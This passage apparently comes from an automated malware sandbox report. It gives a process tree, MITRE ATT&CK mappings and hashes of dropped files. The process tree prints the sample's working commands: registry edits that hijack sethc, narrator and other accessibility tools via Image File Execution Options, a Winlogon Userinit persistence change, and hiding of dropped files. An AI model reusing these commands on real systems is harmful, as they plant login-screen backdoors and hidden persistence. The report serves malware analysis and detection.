  - - C:\Windows\SysWOW64\PING.EXE
      ping
      4⤵
      Runs ping.exe
      PID:2496
  - - C:\Windows\SysWOW64\regini.exe
      regini 7.ini
      4⤵
      PID:4584
  - - C:\Windows\SysWOW64\regini.exe
      regini 2.ini
      4⤵
      Sets file execution options in registry
      PID:4492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:1996
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
      4⤵
      Sets file execution options in registry
      PID:4476
  - - C:\Windows\SysWOW64\regini.exe
      regini 3.ini
      4⤵
      Sets file execution options in registry
      PID:1780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4552
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /f
      4⤵
      Sets file execution options in registry
      PID:2380
  - - C:\Windows\SysWOW64\regini.exe
      regini 4.ini
      4⤵
      Sets file execution options in registry
      PID:4288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4980
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f
      4⤵
      Sets file execution options in registry
      PID:4604
  - - C:\Windows\SysWOW64\regini.exe
      regini 5.ini
      4⤵
      Sets file execution options in registry
      PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /f
      4⤵
      Sets file execution options in registry
      PID:4352
  - - C:\Windows\SysWOW64\regini.exe
      regini 6.ini
      4⤵
      Sets file execution options in registry
      PID:1736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f
      4⤵
      Sets file execution options in registry
      PID:2940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2208
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f
      4⤵
      Sets file execution options in registry
      PID:1436
  - - C:\Windows\SysWOW64\regini.exe
      regini 4.ini
      4⤵
      Sets file execution options in registry
      PID:4932
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4512
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /f
      4⤵
      Sets file execution options in registry
      PID:4572
  - - C:\Windows\SysWOW64\regini.exe
      regini 5.ini
      4⤵
      Sets file execution options in registry
      PID:5052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:5048
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f
      4⤵
      Sets file execution options in registry
      PID:1000
  - - C:\Windows\SysWOW64\regini.exe
      regini 6.ini
      4⤵
      Sets file execution options in registry
      PID:964
  - - C:\Windows\SysWOW64\regini.exe
      regini 2.ini
      4⤵
      Sets file execution options in registry
      PID:5060
  - - C:\Windows\SysWOW64\regini.exe
      regini 3.ini
      4⤵
      Sets file execution options in registry
      PID:4536
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:4120
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}\sethc.bat" /f
      4⤵
      Sets file execution options in registry
      PID:1304
  - - C:\Windows\SysWOW64\regini.exe
      regini 8.ini
      4⤵
      Sets file execution options in registry
      PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:444
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /t REG_SZ /d "C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-99008}\narrator.bat" /f
      4⤵
      Sets file execution options in registry
      PID:3596
  - - C:\Windows\SysWOW64\regini.exe
      regini 9.ini
      4⤵
      Sets file execution options in registry
      PID:1140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:3824
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\Fonts\systom32\n.bat" /f
      4⤵
      Modifies WinLogon for persistence
      PID:4124
  - - C:\Windows\SysWOW64\regini.exe
      regini 7.ini
      4⤵
      PID:4068
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +a +h +r /S /D C:\Windows\Fonts\systom32
      4⤵
      Sets file to hidden
      Drops file in Windows directory
      Views/modifies file attributes
      PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HZ~44E8.tmp.bat

Filesize
266B

MD5
625f8da7892997b1b3cfda2698d21837

SHA1
2acaf42607343010cfbcc159fbcf7e0264012365

SHA256
4d023430f455b2d5fbd9c904b0e260d1dfaf81e2fc8bcab33e1cb0322f70469e

SHA512
de720f17041e213c4871c985466e9b6ac4e1b093f3c4fa3ced308b59b1b5cb08b1ea23a9b9c1bee458f16f00efa5437e16140e764bc7427a96ba81337b4320c2

Download Submit
C:\Windows\Fonts\system32\1.ini

Filesize
79B

MD5
ed4253a7bbfae9e261a21ef735a02bf2

SHA1
637de85cad61e79807a0607fd3d7a074d60ceffc

SHA256
066788c0fb6ebdc85e6ffc68b014bfe7a6fd45e0a3720cb55343ca1acf55dde2

SHA512
3e58509d79cc69fda01172e8a769f2cded1fbd000872953bb371860c3b3cdca16f778cec8b00caae7c6b87bcea0da50aba3333cf20a4d9b9a4ca61efc2afd56a

Download Submit
C:\Windows\Fonts\system32\MSVCP71.dll

Filesize
488KB

MD5
561fa2abb31dfa8fab762145f81667c2

SHA1
c8ccb04eedac821a13fae314a2435192860c72b8

SHA256
df96156f6a548fd6fe5672918de5ae4509d3c810a57bffd2a91de45a3ed5b23b

SHA512
7d960aa8e3cce22d63a6723d7f00c195de7de83b877eca126e339e2d8cc9859e813e05c5c0a5671a75bb717243e9295fd13e5e17d8c6660eb59f5baee63a7c43

Download Submit
C:\Windows\Fonts\system32\MSVCR71.dll

Filesize
340KB

MD5
86f1895ae8c5e8b17d99ece768a70732

SHA1
d5502a1d00787d68f548ddeebbde1eca5e2b38ca

SHA256
8094af5ee310714caebccaeee7769ffb08048503ba478b879edfef5f1a24fefe

SHA512
3b7ce2b67056b6e005472b73447d2226677a8cadae70428873f7efa5ed11a3b3dbf6b1a42c5b05b1f2b1d8e06ff50dfc6532f043af8452ed87687eefbf1791da

Download Submit
C:\Windows\Fonts\system32\csrss.exe

Filesize
119KB

MD5
b2adc5659f8e500dd0b3a7839803c86f

SHA1
689d1ad9b69ef7bf8b348ed41b59534b97f4c323

SHA256
414a4f203b2ed8490c062a7b5902fc11e7228c5901f11c4eb2c2d88fcfd8950b

SHA512
2f9bd95302eaeeefcfdd2b2df2a22fbef1f6d4f9621fe4273184801ad1ac9445853fab98bc0e70bc8a750d7e856e5ca1457ebb1475823565c17be03015d5d103

Download Submit
C:\Windows\Fonts\system32\y.bat

Filesize
1KB

MD5
de17892362b6e0c61d7dad3e131ba34b

SHA1
685840b64f8275936fe69ae5ad43f1b000d015c0

SHA256
3b7ca7c2f2183ead566c509271f1366bfed1d7cd115e1cdd336333bcd32a0630

SHA512
fa506aeed26977078017d26c020cbc156f6ee397c4bfcad9742a78cf3e1c49dd1be11bf6149643ea36d5ec44d07585e3f696f3cadd592846da470d9e3126d186

Download Submit
C:\Windows\Fonts\system\2.ini

Filesize
125B

MD5
7b8c5eeb62af136481a4b8c66d008351

SHA1
09c3ce1f9921a216f8282984851e51c579a0ce8d

SHA256
72786af47a8caa313f931ade892944d07856d45533fb38a0a9ef829af7a17eeb

SHA512
9a8832789f2488c89f14ea687a7006743261db66a86bae4d80f48ddada310d818bd153394262efa2b9e83f4555e2a3d493f0e4fb48a6f16eb5d0a31a62bfae18

Download Submit
C:\Windows\Fonts\system\3.ini

Filesize
128B

MD5
1dc1a3b1e949341e569bd5dd6d194e18

SHA1
452c9169b5c2f7d30e33a5f02abeacea9f033095

SHA256
bd78e7d9d2c9cd478aa18d8a6f845e155b8fbf73819921a994122ccbceb1994b

SHA512
eadfbe7a23ac7be46dd16606e8e8bf2bd09e3b1ed993458f7755a6834564faac46def2c13a642da3e6d4202320075d4918a5fd80997345da469796ad7e9a3e1a

Download Submit
C:\Windows\Fonts\system\4.ini

Filesize
127B

MD5
7859f0173f860d8ec0331125799cf23d

SHA1
7417c949842f25f48ae6a86922b6e592a9f8df57

SHA256
12023f861f81daaf952de7c5f6ad3f35aad0ec93279acd9f19e9e837f1625ba6

SHA512
638be8bcb440392afa18e7aa3fff8b74f3707696887f761c9ce6c65bfa495df67a60ee5ace798b0e9dbca1319018334dc62e2ac4b06b24f1fe6ce5b8ad57def2

Download Submit
C:\Windows\Fonts\system\4.ini

Filesize
112B

MD5
f3147c385f888b6d789aac8efb535e08

SHA1
6400a7db22f6d96374462498d85af32a883ed8d2

SHA256
a77af5932276760d94690690febca75714c3f119965972f4565f01748bd2e2cc

SHA512
2add9ecabc1a5dcb9e959d2290a8057fcf7143147767187d6ae293be4ef3240c67e845f3c4ca05c32fdb791c6cb59254e4049fa87f28828b31633a18d3c1c78c

Download Submit
C:\Windows\Fonts\system\5.ini

Filesize
123B

MD5
ac609bd3da8885211da7859fe68110b5

SHA1
52260e6474541bc744cdf834742f974ca14ef10f

SHA256
3faa067ccfea7a29493cfe3b8ba0afbc7ab16e8ec7b2282fad2b9f7ef1ce5c81

SHA512
df91af0b2d715464095c72091e62f2ae22ad91585baa4f2b1a6f6c129bc93d65ff6fc9953cce2bac90ce429523eab11af14bb16ada4123eaaa28d79e794451f8

Download Submit
C:\Windows\Fonts\system\5.ini

Filesize
108B

MD5
8ddadee601774e9c40d28ab8321b58f1

SHA1
70f668793d85e56f1b196cc8c46a974f4e0873da

SHA256
f5b55a2a07cc1af74e281e4fc5474ddc555da5d2b71b1260f6e76ec484d5a6c7

SHA512
9133a3076cd1d9bd2bad8acb5e5a55df46a5f3c75b8da9c0db3f6161ea97278b2e2a9d6f8c161ddd1230ae365ae9532ddf328b5b06b14aca6b58f2316c187982

Download Submit
C:\Windows\Fonts\system\6.ini

Filesize
127B

MD5
47a636ee2dfd078fcce618c626c513fa

SHA1
866d759e846030a6eeb87f30111bbbde84119f4b

SHA256
4a726015cc19422080ba5964d2b45468162b1d4a93c405f260a01296dcd8463e

SHA512
a83a8d7f81b37635465f0cdfcccc53484419523306917acddc9b8121c1b291274fc5c5c2c64d62c285ac2f24d5856a050a511805ef5819eb45032b8a17acd5ae

Download Submit
C:\Windows\Fonts\system\6.ini

Filesize
112B

MD5
ddc6bf4b3d01b7bb3c631e0725c82e2a

SHA1
5a36f678325f061602dcb6ea8a0c1ee5b719d146

SHA256
8646f989fcbe9df0e4cca907701ccb99e7c31919bc28c59610d33be4a2eb5b9d

SHA512
1dfdf7009c3e4456c60317e15abf531c6f7a835ee9cb761ca7ed36cf6d1f11ffae16b721f49562ac55cc6274f4aae438604581d68bb94bfacad360a9b5f422dd

Download Submit
C:\Windows\Fonts\system\7.ini

Filesize
95B

MD5
6abef2663d60157db012889f3b52ced9

SHA1
12be4193a77baaf305ffa4e39d32695a5068f8a3

SHA256
146e5dfd8dbf3f5fe713bca77505b8370f857ac8ed3075ec78cca00d751fbadf

SHA512
e665fbf0b52da24eb781e62d03c3f97f81113261ec1ad71e3da0d4bec404dfa316825a606a1d9aa427f47ff6f1ce0cf60aaa5f2a245f1cf6218f5aa4f36d77ea

Download Submit
C:\Windows\Fonts\system\8.ini

Filesize
110B

MD5
9f6b199fc66033844122006652e3792c

SHA1
b83fb90577ef827886e19bf5dd6210ed97a9aa0c

SHA256
45fbada1ee2d69c14a037ce59f4678dc25319cd2bab81442cf120dcb307c3754

SHA512
f4a337098896751502002b1e273f2268f882429d52cadf9e02a4bc6d7c87b76a18c2b9edf5f54f398ba966501d1587383ca4a048f6e7e2e973f888517eaa7b62

Download Submit
C:\Windows\Fonts\system\9.ini

Filesize
113B

MD5
f91f1bc4fb15fe4756f805c99477dab6

SHA1
cb63846368b5574e995c265535eab2b29097c2fa

SHA256
310f19d3c018acd6b65b5e9c118c965a53ef7fb0d3dc5ce14917e9a023be08ea

SHA512
bea70a4abfc4ebf4db7294c91012b878ccb1512ae9f2f03d7338b56f7bcdf4f267092cf1b7249fc57e494ec781a813e78996007819e7d6f2b73d4a28e7ff527b

Download Submit
C:\Windows\Fonts\system\OnTimer.db

Filesize
22KB

MD5
d32889a26c0b25bf6d2b8a0801acb49e

SHA1
349495909edc93fbae41bd4fc624caf355f6a530

SHA256
51c9988dd517a81fd7255bbdae79ddddc6d1176e10b6582289dd3d8646100974

SHA512
f44d1e3011880855f350781e7e3924428eb017ad5dd507a7a47c582604977f000b7ca8a28a26132b3534b7bd3b0a100e4a0a708827bd42142df90a393e8e14e9

Download Submit
C:\Windows\Fonts\system\sqlite3.dll

Filesize
408KB

MD5
6bb352274528902a701f6adcaeed3ae7

SHA1
57f310b6450c415aec27fd97c6e5d8e55288eeb9

SHA256
d4a6ddd7c01e46ed96d589d41a4a844d0fc68ba54bbcdffc8cba6701d2a82ce8

SHA512
caf5e17bfe152a4921d9d90a46b694769dadb2c5717b497e0c032c30502164a6ff3af8e40bbc94b7c07ed81391f87db17825ee18bad20389b283cdafd732eaab

Download Submit
C:\Windows\Fonts\system\svchost.exe

Filesize
765KB

MD5
068094b7fae5e1575f2eb99647f3de99

SHA1
e511d5723cc75bb509d96a14ed429b1c46c428ca

SHA256
239ea71f1ade9fcfe63979f9c3042a7812489a1c12778317e504a03b6081d980

SHA512
d04285a5cc6c1b1b0fef72cd45ec0c6cb3e07d80421c4183d81867184da9474a3d11ab9223792d3f143db8108d56af3fd353e0655cd0c471f91863e76ed1c2dc

Download Submit
C:\Windows\Fonts\systom32\n.bat

Filesize
4KB

MD5
609dd715376d8050019f636f99f96787

SHA1
16e0a1a9be310cd9b3e4336cd39bc5274e9870d5

SHA256
031113924ebf0357840ea4522340a3aafb74a823540881acdca67013643cc24d

SHA512
8af6558d53fdd9198c68a3f5e4c45674876ece10075e681252e77dc06da27cd27675805c349e8fa95e286ab2d392c585ba722d32edcd0e9273c321efd5c836c6

Download Submit
C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\n.exe

Filesize
482KB

MD5
8b12bc0c32d14d677fb11c57624ff600

SHA1
364194ed243c277e1c4508c88fa8ddca3dfad012

SHA256
4aea8a4d2f2a8b0871990ab7796a070b1129af94fe649b9706875c27b9eeb9a8

SHA512
b27d99d0e8466e77c286ede186f9a4ceba9c01ec21768449b1799050208c219428cad867bae2a7f6ecb0b97a785e72a3e9e32b54bfd2660ee88802ecc8c5eac4

Download Submit
C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\ping.exe

Filesize
480KB

MD5
19b276d8fdff839280c159b799115eeb

SHA1
cd506ccf193d6157e2d9ef798e2d0783a8f7e84a

SHA256
415b03bf1fd775cc9884bd3551d92fa9889df2bcf4aaf018b1d375d326b2383f

SHA512
d4ea8accf734ba1287654d51a75aa766f92b9f42a65d2cafabf78e99974a59b79a137c9a23f30719eab7a1082e8ae28d578c35c38cee1e781884e01361e4a112

Download Submit
C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sv.exe

Filesize
898KB

MD5
b74667c3b2b8eb3e762702066c9b623b

SHA1
fcd364ea0c5285d53807e9262f7f32cb06358db2

SHA256
385a87437c34406b8c47c3c60bc0720561de6ea88124065c0b4182c39fab3fda

SHA512
23d9edd156a24b627202ce9ada4442b30923f1b5b9902f58ced07fcad206c974307cb1da303a99d3df84f96b7b8fc418d3ef49805e9565a1935eeffa906d4ca9

Download Submit
C:\Windows\Fonts\{123ff-23411-xc56g-78uhb-88888}\sy.exe

Filesize
799KB

MD5
a0445e15e72f98b99da10b55fd4d2500

SHA1
9baeaac8ccf996f3bcf4bd27b62e5e0dbb66343e

SHA256
9d33f4f6ef707579df783479d1534c86c1b32e201456b0dcf40f66631070e153

SHA512
22af4996bb4e33804aafa777c50c71335fe56333a730b4bf9caabb3f9ffdb9a0a1b01ae99a9d6566444ba8a0c59028613832d9fc28e8bb4db65fa2836c09546f

Download Submit
memory/1240-98-0x0000000000400000-0x00000000004C6000-memory.dmp

Filesize
792KB

Download
memory/1240-94-0x0000000000400000-0x00000000004C6000-memory.dmp

Filesize
792KB

Download
memory/3648-81-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/3648-78-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/4592-93-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads